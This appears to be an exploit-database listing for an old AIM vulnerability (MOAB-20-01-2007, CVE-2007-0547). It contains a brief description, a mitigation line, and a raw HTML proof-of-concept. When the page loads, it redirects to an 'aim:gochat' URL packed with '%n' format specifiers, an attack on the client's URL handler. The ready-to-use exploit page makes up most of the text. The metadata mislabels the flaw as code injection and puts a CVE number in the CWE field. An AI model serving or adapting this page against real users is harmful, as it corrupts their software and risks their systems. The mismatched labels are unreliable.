header-logo
Suggest Exploit
vendor:
by:
Unknown
9.8
CVSS
CRITICAL
Code Injection
94
CWE
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-0547
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MOAB-20-01-2007

The exploit is a code injection vulnerability that allows an attacker to execute arbitrary code by manipulating the 'roomname' parameter in the 'aim:gochat' URL scheme. The code uses a loop to create a string of 'A%n' characters and then appends it to the 'aim:gochat?roomname=' prefix. When the 'window.location' is set to this string, the code injection occurs.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before using it in URLs or executing it as code.
Source

Exploit-DB raw data:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-20-01-2007</title>
		<script>
			function boom() {
				var str = '';
				for (var i = 0; i < 20; i++) {
				    str = str + escape('A%n');
				}
				str = 'aim:gochat?roomname=' + str;
				window.location = str;
			}
		</script>
	</head>
	<body onload="boom()">
	</body>
</html>

# milw0rm.com [2007-01-21]